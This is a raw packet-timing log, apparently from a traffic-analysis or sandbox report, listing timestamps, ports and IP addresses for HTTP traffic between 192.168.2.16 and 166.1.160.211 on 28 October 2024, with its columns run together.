                                                                                                                                                              Oct 28, 2024 19:46:18.040652990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040685892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040710926 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.040720940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.040776014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041218996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041253090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041286945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041304111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041321039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041354895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.041377068 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.041974068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042007923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042033911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042042017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042093039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042108059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042774916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042812109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042829037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042846918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042880058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042897940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.042918921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.042968035 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.160427094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.160446882 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.160495996 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161240101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161278009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161310911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161334038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161346912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161381960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161406040 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161415100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161448956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161464930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.161950111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.161983967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162005901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.162035942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162071943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162096977 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.162123919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162157059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.162174940 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.163678885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.163743019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.163841963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.163981915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164017916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164037943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.164123058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164175034 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.164271116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164308071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.164361954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166256905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166294098 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166327000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166348934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166362047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166413069 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166426897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166461945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166496038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166516066 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166528940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166562080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166601896 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166630030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166663885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166687965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166697025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166731119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166749001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166765928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166800022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166815042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166836023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166866064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166883945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166899920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166933060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.166951895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.166966915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167001009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167013884 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167406082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167439938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167468071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167593956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167629004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167646885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167664051 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167697906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167711020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.167731047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.167788982 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168251991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168299913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168332100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168349981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168365955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168401003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168420076 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168435097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168468952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168492079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.168503046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168536901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.168570042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169236898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169272900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169282913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169307947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169342041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169357061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169409990 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169444084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169461012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.169478893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.169532061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170036077 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170070887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170104980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170120001 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170140028 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170180082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170192003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170214891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170248032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170269966 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170285940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170336008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.170902967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170939922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170974970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.170994043 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171009064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171042919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171065092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171077967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.171133995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.171303988 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.191751957 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.192020893 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.192105055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221179962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221215963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221231937 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221252918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221287966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221307039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221323013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221357107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221380949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221391916 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221426964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221446037 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.221462011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.221509933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222110033 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222146034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222182035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222198009 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222218037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222254038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222270012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.222289085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222325087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.222341061 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.266160011 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.268877029 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277035952 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277120113 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277154922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277179956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277354002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277389050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277407885 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277422905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277478933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277489901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277553082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277587891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277604103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277621031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277657032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277678013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.277692080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.277738094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278162003 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278197050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278250933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278250933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278281927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278332949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278564930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278599024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278633118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278650045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278666973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278701067 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278717995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278737068 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278772116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278786898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.278801918 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.278851032 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279367924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279403925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279454947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279454947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279489994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279540062 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279542923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.279572964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279611111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.279628038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280019999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280064106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280067921 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280097961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280133009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280150890 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280165911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280200958 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280226946 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280235052 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280272007 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280291080 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280304909 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280355930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.280913115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280949116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.280977964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281008005 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281013012 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281047106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281066895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281081915 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281116962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281137943 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281151056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281186104 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281208992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281784058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281820059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281836033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281867981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281902075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281920910 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.281936884 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281970024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.281991959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282004118 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282037020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282053947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282078981 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282135963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282721996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282757044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282790899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282818079 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282825947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282861948 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282876015 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282897949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282929897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.282944918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.282963991 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292587996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292622089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292635918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292656898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292690992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292707920 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292725086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292758942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292774916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.292793036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292828083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.292844057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293351889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293385983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293405056 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293421030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293454885 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293488979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293489933 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293523073 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293545008 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293556929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293591022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293608904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:18.293625116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:18.293658972 CET8049726166.1.160.211192.168.2.16
